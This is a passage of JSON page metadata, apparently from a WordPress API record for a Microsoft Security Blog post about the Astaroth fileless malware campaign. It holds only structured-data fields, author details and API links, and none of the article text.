osition":2,"name":"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack"}]},{"@type":"WebSite","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/","name":"Microsoft Security Blog","description":"Expert coverage of cybersecurity topics","publisher":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization","name":"Microsoft Security Blog","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png","width":512,"height":512,"caption":"Microsoft Security Blog"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/person\/060b835777058efc81d6828a64820f98","name":"Microsoft Security Threat Intelligence - 
Editor","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g52243f56b7f8688616d4ca12dc0148e2","url":"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g","caption":"Microsoft Security Threat Intelligence - Editor"},"url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/eravena\/"}]}},"bloginabox_animated_featured_image":null,"bloginabox_display_generated_audio":false,"distributor_meta":false,"distributor_terms":false,"distributor_media":false,"distributor_original_site_name":"Microsoft Security Blog","distributor_original_site_url":"https:\/\/www.microsoft.com\/en-us\/security\/blog","push-errors":false,"_links":{"self":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/89592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/users\/68"}],"replies":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/comments?post=89592"}],"version-history":[{"count":2,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/89592\/revisions"}],"predecessor-version":[{"id":144649,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/posts\/89592\/revisions\/144649"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/media\/89711"}],"wp:attachment":[{"href
":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/media?parent=89592"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/post_tag?post=89592"},{"taxonomy":"threat-intelligence","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/threat-intelligence?post=89592"},{"taxonomy":"content-type","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/content-type?post=89592"},{"taxonomy":"job-role","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/job-role?post=89592"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/product?post=89592"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/topic?post=89592"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-json\/wp\/v2\/coauthors?post=89592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}